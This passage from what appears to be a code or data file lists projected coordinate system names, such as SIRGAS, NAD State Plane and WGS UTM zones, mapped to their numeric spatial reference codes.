'SAD_1969_Brazil_Polyconic': 29101, 'SAD_1969_UTM_Zone_18N': 29118, 'SAD_1969_UTM_Zone_19N': 29119, 'SAD_1969_UTM_Zone_20N': 29120, 'SAD_1969_UTM_Zone_21N': 29121, 'SAD_1969_UTM_Zone_22N': 29122, 'SAD_1969_UTM_Zone_18N': 29168, 'SAD_1969_UTM_Zone_19N': 29169, 'SAD_1969_UTM_Zone_20N': 29170, 'SAD_1969_UTM_Zone_21N': 29171, 'SAD_1969_UTM_Zone_22N': 29172, 'SAD_1969_UTM_Zone_17S': 29177, 'SAD_1969_UTM_Zone_18S': 29178, 'SAD_1969_UTM_Zone_19S': 29179, 'SAD_1969_UTM_Zone_20S': 29180, 'SAD_1969_UTM_Zone_21S': 29181, 'SAD_1969_UTM_Zone_22S': 29182, 'SAD_1969_UTM_Zone_23S': 29183, 'SAD_1969_UTM_Zone_24S': 29184, 'SAD_1969_UTM_Zone_25S': 29185, 'SAD_1969_UTM_Zone_17S': 29187, 'SAD_1969_UTM_Zone_18S': 29188, 'SAD_1969_UTM_Zone_19S': 29189, 'SAD_1969_UTM_Zone_20S': 29190, 'SAD_1969_UTM_Zone_21S': 29191, 'SAD_1969_UTM_Zone_22S': 29192, 'SAD_1969_UTM_Zone_23S': 29193, 'SAD_1969_UTM_Zone_24S': 29194, 'SAD_1969_UTM_Zone_25S': 29195, 'Sapper_Hill_1943_UTM_Zone_20S': 29220, 'Sapper_Hill_1943_UTM_Zone_21S': 29221, 'Schwarzeck_UTM_Zone_33S': 29333, 'Sudan_UTM_Zone_35N': 29635, 'Sudan_UTM_Zone_36N': 29636, 'Tananarive_1925_UTM_Zone_38S': 29738, 'Tananarive_1925_UTM_Zone_39S': 29739, 'Timbalai_1948_UTM_Zone_49N': 29849, 'Timbalai_1948_UTM_Zone_50N': 29850, 'Timbalai_1948_RSO_Borneo_Chains': 29871, 'Timbalai_1948_RSO_Borneo_Feet': 29872, 'Timbalai_1948_RSO_Borneo_Meters': 29873, 'TM65_Irish_Grid': 29900, 'OSNI_1952_Irish_National_Grid': 29901, 'TM65_Irish_Grid': 29902, 'TM75_Irish_Grid': 29903, 'Japan_Zone_1': 30161, 'Japan_Zone_2': 30162, 'Japan_Zone_3': 30163, 'Japan_Zone_4': 30164, 'Japan_Zone_5': 30165, 'Japan_Zone_6': 30166, 'Japan_Zone_7': 30167, 'Japan_Zone_8': 30168, 'Japan_Zone_9': 30169, 'Japan_Zone_10': 30170, 'Japan_Zone_11': 30171, 'Japan_Zone_12': 30172, 'Japan_Zone_13': 30173, 'Japan_Zone_14': 30174, 'Japan_Zone_15': 30175, 'Japan_Zone_16': 30176, 'Japan_Zone_17': 30177, 'Japan_Zone_18': 30178, 'Japan_Zone_19': 30179, 'Trinidad_1903_Trinidad_Grid': 30200, 'TC_1948_UTM_Zone_39N': 30339, 'TC_1948_UTM_Zone_40N': 30340, 'Nord_Algerie_Ancienne': 30491, 'Sud_Algerie_Ancienne': 30492, 'Voirol_1879_Nord_Algerie_Ancienne': 30493, 'Voirol_1879_Sud_Algerie_Ancienne': 30494, 'Nord_Algerie': 30591, 'Sud_Algerie': 30592, 'Nord_Sahara_1959_UTM_Zone_29N': 30729, 'Nord_Sahara_1959_UTM_Zone_30N': 30730, 'Nord_Sahara_1959_UTM_Zone_31N': 30731, 'Nord_Sahara_1959_UTM_Zone_32N': 30732, 'Nord_Sahara_1959_Voirol_Unifie_Nord': 30791, 'Nord_Sahara_1959_Voirol_Unifie_Sud': 30792, 'Swedish_National_Grid': 30800, 'Yoff_1972_UTM_Zone_28N': 31028, 'Zanderij_1972_UTM_Zone_21N': 31121, 'Zanderij_TM_54_NW': 31154, 'Zanderij_Suriname_Old_TM': 31170, 'Zanderij_Suriname_TM': 31171, 'MGI_Ferro_Austria_GK_West': 31251, 'MGI_Ferro_Austria_GK_Central': 31252, 'MGI_Ferro_Austria_GK_East': 31253, 'MGI_Austria_GK_West': 31254, 'MGI_Austria_GK_Central': 31255, 'MGI_Austria_GK_East': 31256, 'MGI_Austria_GK_M28': 31257, 'MGI_Austria_GK_M31': 31258, 'MGI_Austria_GK_M34': 31259, 'MGI_3_Degree_Gauss_Zone_5': 31265, 'MGI_3_Degree_Gauss_Zone_6': 31266, 'MGI_3_Degree_Gauss_Zone_7': 31267, 'MGI_3_Degree_Gauss_Zone_8': 31268, 'MGI_Balkans_5': 31275, 'MGI_Balkans_6': 31276, 'MGI_Balkans_7': 31277, 'MGI_Balkans_8': 31278, 'MGI_Balkans_8': 31279, 'Austria_West_Zone': 31281, 'Austria_Central_Zone': 31282, 'Austria_East_Zone': 31283, 'MGI_M28': 31284, 'MGI_M31': 31285, 'MGI_M34': 31286, 'MGI_Austria_Lambert': 31287, 'MGI_Ferro_M28': 31288, 'MGI_Ferro_M31': 31289, 'MGI_Ferro_M34': 31290, 'Austria_West_Zone': 31291, 'Austria_Central_Zone': 31292, 'Austria_East_Zone': 31293, 'MGI_M28': 31294, 'MGI_M31': 31295, 'MGI_M34': 31296, 'MGI_Austria_Lambert': 31297, 'Belge_Lambert_1972': 31370, 'DHDN_3_Degree_Gauss_Zone_1': 31461, 'DHDN_3_Degree_Gauss_Zone_2': 31462, 'DHDN_3_Degree_Gauss_Zone_3': 31463, 'DHDN_3_Degree_Gauss_Zone_4': 31464, 'DHDN_3_Degree_Gauss_Zone_5': 31465, 'DHDN_3_Degree_Gauss_Zone_2': 31466, 'DHDN_3_Degree_Gauss_Zone_3': 31467, 'DHDN_3_Degree_Gauss_Zone_4': 31468, 'DHDN_3_Degree_Gauss_Zone_5': 31469, 'Germany_Zone_1': 31491, 'Germany_Zone_2': 31492, 'Germany_Zone_3': 31493, 'Germany_Zone_4': 31494, 'Germany_Zone_5': 31495, 'Conakry_1905_UTM_Zone_28N': 31528, 'Conakry_1905_UTM_Zone_29N': 31529, 'Stereo_33': 31600, 'Stereo_70': 31700, 'NGN_UTM_Zone_38N': 31838, 'NGN_UTM_Zone_39N': 31839, 'KUDAMS_KTM': 31901, 'SIRGAS_UTM_Zone_17N': 31917, 'SIRGAS_UTM_Zone_18N': 31918, 'SIRGAS_UTM_Zone_19N': 31919, 'SIRGAS_UTM_Zone_20N': 31920, 'SIRGAS_UTM_Zone_21N': 31921, 'SIRGAS_UTM_Zone_22N': 31922, 'SIRGAS_2000_UTM_Zone_17N': 31971, 'SIRGAS_2000_UTM_Zone_18N': 31972, 'SIRGAS_2000_UTM_Zone_19N': 31973, 'SIRGAS_2000_UTM_Zone_20N': 31974, 'SIRGAS_2000_UTM_Zone_21N': 31975, 'SIRGAS_2000_UTM_Zone_22N': 31976, 'SIRGAS_2000_UTM_Zone_17S': 31977, 'SIRGAS_2000_UTM_Zone_18S': 31978, 'SIRGAS_2000_UTM_Zone_19S': 31979, 'SIRGAS_2000_UTM_Zone_20S': 31980, 'SIRGAS_2000_UTM_Zone_21S': 31981, 'SIRGAS_2000_UTM_Zone_22S': 31982, 'SIRGAS_2000_UTM_Zone_23S': 31983, 'SIRGAS_2000_UTM_Zone_24S': 31984, 'SIRGAS_2000_UTM_Zone_25S': 31985, 'SIRGAS_UTM_Zone_17N': 31986, 'SIRGAS_UTM_Zone_18N': 31987, 'SIRGAS_UTM_Zone_19N': 31988, 'SIRGAS_UTM_Zone_20N': 31989, 'SIRGAS_UTM_Zone_21N': 31990, 'SIRGAS_UTM_Zone_22N': 31991, 'SIRGAS_UTM_Zone_17S': 31992, 'SIRGAS_UTM_Zone_18S': 31993, 'SIRGAS_UTM_Zone_19S': 31994, 'SIRGAS_UTM_Zone_20S': 31995, 'SIRGAS_UTM_Zone_21S': 31996, 'SIRGAS_UTM_Zone_22S': 31997, 'SIRGAS_UTM_Zone_23S': 31998, 'SIRGAS_UTM_Zone_24S': 31999, 'SIRGAS_UTM_Zone_25S': 32000, 'NAD_1927_StatePlane_Montana_North_FIPS_2501': 32001, 'NAD_1927_StatePlane_Montana_Central_FIPS_2502': 32002, 'NAD_1927_StatePlane_Montana_South_FIPS_2503': 32003, 'NAD_1927_StatePlane_Nebraska_North_FIPS_2601': 32005, 'NAD_1927_StatePlane_Nebraska_South_FIPS_2602': 32006, 'NAD_1927_StatePlane_Nevada_East_FIPS_2701': 32007, 'NAD_1927_StatePlane_Nevada_Central_FIPS_2702': 32008, 'NAD_1927_StatePlane_Nevada_West_FIPS_2703': 32009, 'NAD_1927_StatePlane_New_Hampshire_FIPS_2800': 32010, 'NAD_1927_StatePlane_New_Jersey_FIPS_2900': 32011, 'NAD_1927_StatePlane_New_Mexico_East_FIPS_3001': 32012, 'NAD_1927_StatePlane_New_Mexico_Central_FIPS_3002': 32013, 'NAD_1927_StatePlane_New_Mexico_West_FIPS_3003': 32014, 'NAD_1927_StatePlane_New_York_East_FIPS_3101': 32015, 'NAD_1927_StatePlane_New_York_Central_FIPS_3102': 32016, 'NAD_1927_StatePlane_New_York_West_FIPS_3103': 32017, 'NAD_1927_StatePlane_New_York_Long_Island_FIPS_3104': 32018, 'NAD_1927_StatePlane_North_Carolina_FIPS_3200': 32019, 'NAD_1927_StatePlane_North_Dakota_North_FIPS_3301': 32020, 'NAD_1927_StatePlane_North_Dakota_South_FIPS_3302': 32021, 'NAD_1927_StatePlane_Ohio_North_FIPS_3401': 32022, 'NAD_1927_StatePlane_Ohio_South_FIPS_3402': 32023, 'NAD_1927_StatePlane_Oklahoma_North_FIPS_3501': 32024, 'NAD_1927_StatePlane_Oklahoma_South_FIPS_3502': 32025, 'NAD_1927_StatePlane_Oregon_North_FIPS_3601': 32026, 'NAD_1927_StatePlane_Oregon_South_FIPS_3602': 32027, 'NAD_1927_StatePlane_Pennsylvania_North_FIPS_3701': 32028, 'NAD_1927_StatePlane_Pennsylvania_South_FIPS_3702': 32029, 'NAD_1927_StatePlane_Rhode_Island_FIPS_3800': 32030, 'NAD_1927_StatePlane_South_Carolina_North_FIPS_3901': 32031, 'NAD_1927_StatePlane_South_Carolina_South_FIPS_3902': 32033, 'NAD_1927_StatePlane_South_Dakota_North_FIPS_4001': 32034, 'NAD_1927_StatePlane_South_Dakota_South_FIPS_4002': 32035, 'NAD_1927_StatePlane_Tennessee_FIPS_4100': 32036, 'NAD_1927_StatePlane_Texas_North_FIPS_4201': 32037, 'NAD_1927_StatePlane_Texas_North_Central_FIPS_4202': 32038, 'NAD_1927_StatePlane_Texas_Central_FIPS_4203': 32039, 'NAD_1927_StatePlane_Texas_South_Central_FIPS_4204': 32040, 'NAD_1927_StatePlane_Texas_South_FIPS_4205': 32041, 'NAD_1927_StatePlane_Utah_North_FIPS_4301': 32042, 'NAD_1927_StatePlane_Utah_Central_FIPS_4302': 32043, 'NAD_1927_StatePlane_Utah_South_FIPS_4303': 32044, 'NAD_1927_StatePlane_Vermont_FIPS_4400': 32045, 'NAD_1927_StatePlane_Virginia_North_FIPS_4501': 32046, 'NAD_1927_StatePlane_Virginia_South_FIPS_4502': 32047, 'NAD_1927_StatePlane_Washington_North_FIPS_4601': 32048, 'NAD_1927_StatePlane_Washington_South_FIPS_4602': 32049, 'NAD_1927_StatePlane_West_Virginia_North_FIPS_4701': 32050, 'NAD_1927_StatePlane_West_Virginia_South_FIPS_4702': 32051, 'NAD_1927_StatePlane_Wisconsin_North_FIPS_4801': 32052, 'NAD_1927_StatePlane_Wisconsin_Central_FIPS_4802': 32053, 'NAD_1927_StatePlane_Wisconsin_South_FIPS_4803': 32054, 'NAD_1927_StatePlane_Wyoming_East_FIPS_4901': 32055, 'NAD_1927_StatePlane_Wyoming_East_Central_FIPS_4902': 32056, 'NAD_1927_StatePlane_Wyoming_West_Central_FIPS_4903': 32057, 'NAD_1927_StatePlane_Wyoming_West_FIPS_4904': 32058, 'NAD_1927_StatePlane_Puerto_Rico_FIPS_5201': 32059, 'NAD_1927_StatePlane_Virgin_Islands_St_Croix_FIPS_5202': 32060, 'NAD_1927_Guatemala_Norte': 32061, 'NAD_1927_Guatemala_Sur': 32062, 'NAD_1927_BLM_Zone_14N': 32064, 'NAD_1927_BLM_Zone_15N': 32065, 'NAD_1927_BLM_Zone_16N': 32066, 'NAD_1927_BLM_Zone_17N': 32067, 'NAD_1927_BLM_Zone_14N': 32074, 'NAD_1927_BLM_Zone_15N': 32075, 'NAD_1927_BLM_Zone_16N': 32076, 'NAD_1927_BLM_Zone_17N': 32077, 'NAD_1927_MTM_1': 32081, 'NAD_1927_MTM_2': 32082, 'NAD_1927_MTM_3': 32083, 'NAD_1927_MTM_4': 32084, 'NAD_1927_MTM_5': 32085, 'NAD_1927_MTM_6': 32086, 'NAD_1927_Quebec_Lambert': 32098, 'NAD_1927_StatePlane_Louisiana_Offshore_FIPS_1703': 32099, 'NAD_1983_StatePlane_Montana_FIPS_2500': 32100, 'NAD_1983_StatePlane_Nebraska_FIPS_2600': 32104, 'NAD_1983_StatePlane_Nevada_East_FIPS_2701': 32107, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702': 32108, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703': 32109, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800': 32110, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900': 32111, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001': 32112, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002': 32113, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003': 32114, 'NAD_1983_StatePlane_New_York_East_FIPS_3101': 32115, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102': 32116, 'NAD_1983_StatePlane_New_York_West_FIPS_3103': 32117, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104': 32118, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200': 32119, 'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301': 32120, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302': 32121, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401': 32122, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402': 32123, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501': 32124, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502': 32125, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601': 32126, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602': 32127, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701': 32128, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702': 32129, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800': 32130, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900': 32133, 'NAD_1983_StatePlane_South_Dakota_North_FIPS_4001': 32134, 'NAD_1983_StatePlane_South_Dakota_South_FIPS_4002': 32135, 'NAD_1983_StatePlane_Tennessee_FIPS_4100': 32136, 'NAD_1983_StatePlane_Texas_North_FIPS_4201': 32137, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202': 32138, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203': 32139, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204': 32140, 'NAD_1983_StatePlane_Texas_South_FIPS_4205': 32141, 'NAD_1983_StatePlane_Utah_North_FIPS_4301': 32142, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302': 32143, 'NAD_1983_StatePlane_Utah_South_FIPS_4303': 32144, 'NAD_1983_StatePlane_Vermont_FIPS_4400': 32145, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501': 32146, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502': 32147, 'NAD_1983_StatePlane_Washington_North_FIPS_4601': 32148, 'NAD_1983_StatePlane_Washington_South_FIPS_4602': 32149, 'NAD_1983_StatePlane_West_Virginia_North_FIPS_4701': 32150, 'NAD_1983_StatePlane_West_Virginia_South_FIPS_4702': 32151, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801': 32152, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802': 32153, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803': 32154, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901': 32155, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902': 32156, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903': 32157, 'NAD_1983_StatePlane_Wyoming_West_FIPS_4904': 32158, 'NAD_1983_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 32161, 'NAD_1983_BLM_Zone_14N_ftUS': 32164, 'NAD_1983_BLM_Zone_15N_ftUS': 32165, 'NAD_1983_BLM_Zone_16N_ftUS': 32166, 'NAD_1983_BLM_Zone_17N_ftUS': 32167, 'NAD_1983_MTM_2_SCoPQ': 32180, 'NAD_1983_MTM_1': 32181, 'NAD_1983_MTM_2': 32182, 'NAD_1983_MTM_3': 32183, 'NAD_1983_MTM_4': 32184, 'NAD_1983_MTM_5': 32185, 'NAD_1983_MTM_6': 32186, 'NAD_1983_MTM_7': 32187, 'NAD_1983_MTM_8': 32188, 'NAD_1983_MTM_9': 32189, 'NAD_1983_MTM_10': 32190, 'NAD_1983_MTM_11': 32191, 'NAD_1983_MTM_12': 32192, 'NAD_1983_MTM_13': 32193, 'NAD_1983_MTM_14': 32194, 'NAD_1983_MTM_15': 32195, 'NAD_1983_MTM_16': 32196, 'NAD_1983_MTM_17': 32197, 'NAD_1983_Quebec_Lambert': 32198, 'NAD_1983_StatePlane_Louisiana_Offshore_FIPS_1703': 32199, 'WGS_1972_UTM_Zone_1N': 32201, 'WGS_1972_UTM_Zone_2N': 32202, 'WGS_1972_UTM_Zone_3N': 32203, 'WGS_1972_UTM_Zone_4N': 32204, 'WGS_1972_UTM_Zone_5N': 32205, 'WGS_1972_UTM_Zone_6N': 32206, 'WGS_1972_UTM_Zone_7N': 32207, 'WGS_1972_UTM_Zone_8N': 32208, 'WGS_1972_UTM_Zone_9N': 32209, 'WGS_1972_UTM_Zone_10N': 32210, 'WGS_1972_UTM_Zone_11N': 32211, 'WGS_1972_UTM_Zone_12N': 32212, 'WGS_1972_UTM_Zone_13N': 32213, 'WGS_1972_UTM_Zone_14N': 32214, 'WGS_1972_UTM_Zone_15N': 32215, 'WGS_1972_UTM_Zone_16N': 32216, 'WGS_1972_UTM_Zone_17N': 32217, 'WGS_1972_UTM_Zone_18N': 32218, 'WGS_1972_UTM_Zone_19N': 32219, 'WGS_1972_UTM_Zone_20N': 32220, 'WGS_1972_UTM_Zone_21N': 32221, 'WGS_1972_UTM_Zone_22N': 32222, 'WGS_1972_UTM_Zone_23N': 32223, 'WGS_1972_UTM_Zone_24N': 32224, 'WGS_1972_UTM_Zone_25N': 32225, 'WGS_1972_UTM_Zone_26N': 32226, 'WGS_1972_UTM_Zone_27N': 32227, 'WGS_1972_UTM_Zone_28N': 32228, 'WGS_1972_UTM_Zone_29N': 32229, 'WGS_1972_UTM_Zone_30N': 32230, 'WGS_1972_UTM_Zone_31N': 32231, 'WGS_1972_UTM_Zone_32N': 32232, 'WGS_1972_UTM_Zone_33N': 32233, 'WGS_1972_UTM_Zone_34N': 32234, 'WGS_1972_UTM_Zone_35N': 32235, 'WGS_1972_UTM_Zone_36N': 32236, 'WGS_1972_UTM_Zone_37N': 32237, 'WGS_1972_UTM_Zone_38N': 32238, 'WGS_1972_UTM_Zone_39N': 32239, 'WGS_1972_UTM_Zone_40N': 32240, 'WGS_1972_UTM_Zone_41N': 32241, 'WGS_1972_UTM_Zone_42N': 32242, 'WGS_1972_UTM_Zone_43N': 32243, 'WGS_1972_UTM_Zone_44N': 32244, 'WGS_1972_UTM_Zone_45N': 32245, 'WGS_1972_UTM_Zone_46N': 32246, 'WGS_1972_UTM_Zone_47N': 32247, 'WGS_1972_UTM_Zone_48N': 32248, 'WGS_1972_UTM_Zone_49N': 32249, 'WGS_1972_UTM_Zone_50N': 32250, 'WGS_1972_UTM_Zone_51N': 32251, 'WGS_1972_UTM_Zone_52N': 32252, 'WGS_1972_UTM_Zone_53N': 32253, 'WGS_1972_UTM_Zone_54N': 32254, 'WGS_1972_UTM_Zone_55N': 32255, 'WGS_1972_UTM_Zone_56N': 32256, 'WGS_1972_UTM_Zone_57N': 32257, 'WGS_1972_UTM_Zone_58N': 32258, 'WGS_1972_UTM_Zone_59N': 32259, 'WGS_1972_UTM_Zone_60N': 32260, 'WGS_1972_UTM_Zone_1S': 32301, 'WGS_1972_UTM_Zone_2S': 32302, 'WGS_1972_UTM_Zone_3S': 32303, 'WGS_1972_UTM_Zone_4S': 32304, 'WGS_1972_UTM_Zone_5S': 32305, 'WGS_1972_UTM_Zone_6S': 32306, 'WGS_1972_UTM_Zone_7S': 32307, 'WGS_1972_UTM_Zone_8S': 32308, 'WGS_1972_UTM_Zone_9S': 32309, 'WGS_1972_UTM_Zone_10S': 32310, 'WGS_1972_UTM_Zone_11S': 32311, 'WGS_1972_UTM_Zone_12S': 32312, 'WGS_1972_UTM_Zone_13S': 32313, 'WGS_1972_UTM_Zone_14S': 32314, 'WGS_1972_UTM_Zone_15S': 32315, 'WGS_1972_UTM_Zone_16S': 32316, 'WGS_1972_UTM_Zone_17S': 32317, 'WGS_1972_UTM_Zone_18S': 32318, 'WGS_1972_UTM_Zone_19S': 32319, 'WGS_1972_UTM_Zone_20S': 32320, 'WGS_1972_UTM_Zone_21S': 32321, 'WGS_1972_UTM_Zone_22S': 32322, 'WGS_1972_UTM_Zone_23S': 32323, 'WGS_1972_UTM_Zone_24S': 32324, 'WGS_1972_UTM_Zone_25S': 32325, 'WGS_1972_UTM_Zone_26S': 32326, 'WGS_1972_UTM_Zone_27S': 32327, 'WGS_1972_UTM_Zone_28S': 32328, 'WGS_1972_UTM_Zone_29S': 32329, 'WGS_1972_UTM_Zone_30S': 32330, 'WGS_1972_UTM_Zone_31S': 32331, 'WGS_1972_UTM_Zone_32S': 32332, 'WGS_1972_UTM_Zone_33S': 32333, 'WGS_1972_UTM_Zone_34S': 32334, 'WGS_1972_UTM_Zone_35S': 32335, 'WGS_1972_UTM_Zone_36S': 32336, 'WGS_1972_UTM_Zone_37S': 32337, 'WGS_1972_UTM_Zone_38S': 32338, 'WGS_1972_UTM_Zone_39S': 32339, 'WGS_1972_UTM_Zone_40S': 32340, 'WGS_1972_UTM_Zone_41S': 32341, 'WGS_1972_UTM_Zone_42S': 32342, 'WGS_1972_UTM_Zone_43S': 32343, 'WGS_1972_UTM_Zone_44S': 32344, 'WGS_1972_UTM_Zone_45S': 32345, 'WGS_1972_UTM_Zone_46S': 32346, 'WGS_1972_UTM_Zone_47S': 32347, 'WGS_1972_UTM_Zone_48S': 32348, 'WGS_1972_UTM_Zone_49S': 32349, 'WGS_1972_UTM_Zone_50S': 32350, 'WGS_1972_UTM_Zone_51S': 32351, 'WGS_1972_UTM_Zone_52S': 32352, 'WGS_1972_UTM_Zone_53S': 32353, 'WGS_1972_UTM_Zone_54S': 32354, 'WGS_1972_UTM_Zone_55S': 32355, 'WGS_1972_UTM_Zone_56S': 32356, 'WGS_1972_UTM_Zone_57S': 32357, 'WGS_1972_UTM_Zone_58S': 32358, 'WGS_1972_UTM_Zone_59S': 32359, 'WGS_1972_UTM_Zone_60S': 32360, 'WGS_1984_UTM_Zone_1N': 32601, 'WGS_1984_UTM_Zone_2N': 32602, 'WGS_1984_UTM_Zone_3N': 32603, 'WGS_1984_UTM_Zone_4N': 32604, 'WGS_1984_UTM_Zone_5N': 32605, 'WGS_1984_UTM_Zone_6N': 32606, 'WGS_1984_UTM_Zone_7N': 32607, 'WGS_1984_UTM_Zone_8N': 32608, 'WGS_1984_UTM_Zone_9N': 32609, 'WGS_1984_UTM_Zone_10N': 32610, 'WGS_1984_UTM_Zone_11N': 32611, 'WGS_1984_UTM_Zone_12N': 32612, 'WGS_1984_UTM_Zone_13N': 32613, 'WGS_1984_UTM_Zone_14N': 32614, 'WGS_1984_UTM_Zone_15N': 32615, 'WGS_1984_UTM_Zone_16N': 32616, 'WGS_1984_UTM_Zone_17N': 32617, 'WGS_1984_UTM_Zone_18N': 32618, 'WGS_1984_UTM_Zone_19N': 32619, 'WGS_1984_UTM_Zone_20N': 32620, 'WGS_1984_UTM_Zone_21N': 32621, 'WGS_1984_UTM_Zone_22N': 32622, 'WGS_1984_UTM_Zone_23N': 32623, 'WGS_1984_UTM_Zone_24N': 32624, 'WGS_1984_UTM_Zone_25N': 32625, 'WGS_1984_UTM_Zone_26N': 32626, 'WGS_1984_UTM_Zone_27N': 32627, 'WGS_1984_UTM_Zone_28N': 32628, 'WGS_1984_UTM_Zone_29N': 32629, 'WGS_1984_UTM_Zone_30N': 32630, 'WGS_1984_UTM_Zone_31N': 32631, 'WGS_1984_UTM_Zone_32N': 32632, 'WGS_1984_UTM_Zone_33N': 32633, 'WGS_1984_UTM_Zone_34N': 32634, 'WGS_1984_UTM_Zone_35N': 32635, 'WGS_1984_UTM_Zone_36N': 32636, 'WGS_1984_UTM_Zone_37N': 32637, 'WGS_1984_UTM_Zone_38N': 32638, 'WGS_1984_UTM_Zone_39N': 32639, 'WGS_1984_UTM_Zone_40N': 32640, 'WGS_1984_UTM_Zone_41N': 32641, 'WGS_1984_UTM_Zone_42N': 32642, 'WGS_1984_UTM_Zone_43N': 32643, 'WGS_1984_UTM_Zone_44N': 32644, 'WGS_1984_UTM_Zone_45N': 32645, 'WGS_1984_UTM_Zone_46N': 32646, 'WGS_1984_UTM_Zone_47N': 32647, 'WGS_1984_UTM_Zone_48N': 32648, 'WGS_1984_UTM_Zone_49N': 32649, 'WGS_1984_UTM_Zone_50N': 32650, 'WGS_1984_UTM_Zone_51N': 32651, 'WGS_1984_UTM_Zone_52N': 32652, 'WGS_1984_UTM_Zone_53N': 32653, 'WGS_1984_UTM_Zone_54N': 32654, 'WGS_1984_UTM_Zone_55N': 32655, 'WGS_1984_UTM_Zone_56N': 32656, 'WGS_1984_UTM_Zone_57N': 32657, 'WGS_1984_UTM_Zone_58N': 32658, 'WGS_1984_UTM_Zone_59N': 32659, 'WGS_1984_UTM_Zone_60N': 32660, 'UPS_North': 32661, 'WGS_1984_Plate_Carree': 32662, 'WGS_1984_BLM_Zone_14N_ftUS': 32664, 'WGS_1984_BLM_Zone_15N_ftUS': 32665, 'WGS_1984_BLM_Zone_16N_ftUS': 32666, 'WGS_1984_BLM_Zone_17N_ftUS': 32667, 'WGS_1984_UTM_Zone_1S': 32701, 'WGS_1984_UTM_Zone_2S': 32702, 'WGS_1984_UTM_Zone_3S': 32703, 'WGS_1984_UTM_Zone_4S': 32704, 'WGS_1984_UTM_Zone_5S': 32705, 'WGS_1984_UTM_Zone_6S': 32706, 'WGS_1984_UTM_Zone_7S': 32707, 'WGS_1984_UTM_Zone_8S': 32708, 'WGS_1984_UTM_Zone_9S': 32709, 'WGS_1984_UTM_Zone_10S': 32710, 'WGS_1984_UTM_Zone_11S': 32711, 'WGS_1984_UTM_Zone_12S': 32712, 'WGS_1984_UTM_Zone_13S': 32713, 'WGS_1984_UTM_Zone_14S': 32714, 'WGS_1984_UTM_Zone_15S': 32715, 'WGS_1984_UTM_Zone_16S': 32716, 'WGS_1984_UTM_Zone_17S': 32717, 'WGS_1984_UTM_Zone_18S': 32718, 'WGS_1984_UTM_Zone_19S': 32719, 'WGS_1984_UTM_Zone_20S': 32720, 'WGS_1984_UTM_Zone_21S': 32721, 'WGS_1984_UTM_Zone_22S': 32722, 'WGS_1984_UTM_Zone_23S': 32723, 'WGS_1984_UTM_Zone_24S': 32724, 'WGS_1984_UTM_Zone_25S': 32725, 'WGS_1984_UTM_Zone_26S': 32726, 'WGS_1984_UTM_Zone_27S': 32727, 'WGS_1984_UTM_Zone_28S': 32728, 'WGS_1984_UTM_Zone_29S': 32729, 'WGS_1984_UTM_Zone_30S': 32730, 'WGS_1984_UTM_Zone_31S': 32731, 'WGS_1984_UTM_Zone_32S': 32732, 'WGS_1984_UTM_Zone_33S': 32733, 'WGS_1984_UTM_Zone_34S': 32734, 'WGS_1984_UTM_Zone_35S': 32735, 'WGS_1984_UTM_Zone_36S': 32736, 'WGS_1984_UTM_Zone_37S': 32737, 'WGS_1984_UTM_Zone_38S': 32738, 'WGS_1984_UTM_Zone_39S': 32739, 'WGS_1984_UTM_Zone_40S': 32740, 'WGS_1984_UTM_Zone_41S': 32741, 'WGS_1984_UTM_Zone_42S': 32742, 'WGS_1984_UTM_Zone_43S': 32743, 'WGS_1984_UTM_Zone_44S': 32744, 'WGS_1984_UTM_Zone_45S': 32745, 'WGS_1984_UTM_Zone_46S': 32746, 'WGS_1984_UTM_Zone_47S': 32747, 'WGS_1984_UTM_Zone_48S': 32748, 'WGS_1984_UTM_Zone_49S': 32749, 'WGS_1984_UTM_Zone_50S': 32750, 'WGS_1984_UTM_Zone_51S': 32751, 'WGS_1984_UTM_Zone_52S': 32752, 'WGS_1984_UTM_Zone_53S': 32753, 'WGS_1984_UTM_Zone_54S': 32754, 'WGS_1984_UTM_Zone_55S': 32755, 'WGS_1984_UTM_Zone_56S': 32756, 'WGS_1984_UTM_Zone_57S': 32757, 'WGS_1984_UTM_Zone_58S': 32758, 'WGS_1984_UTM_Zone_59S': 32759, 'WGS_1984_UTM_Zone_60S': 32760, 'UPS_South': 32761, 'WGS_1984_TM_36_SE': 32766, 'Sphere_Plate_Carree': 53001, 'Sphere_Equidistant_Cylindrical': 53002, 'Sphere_Miller_Cylindrical': 53003, 'Sphere_Mercator': 53004, 'Sphere_Sinusoidal': 53008, 'Sphere_Mollweide': 53009, 'Sphere_Eckert_VI': 53010, 'Sphere_Eckert_V': 53011, 'Sphere_Eckert_IV': 53012, 'Sphere_Eckert_III': 53013, 'Sphere_Eckert_II': 53014, 'Sphere_Eckert_I': 53015, 'Sphere_Gall_Stereographic': 53016, 'Sphere_Behrmann': 53017, 'Sphere_Winkel_I': 53018, 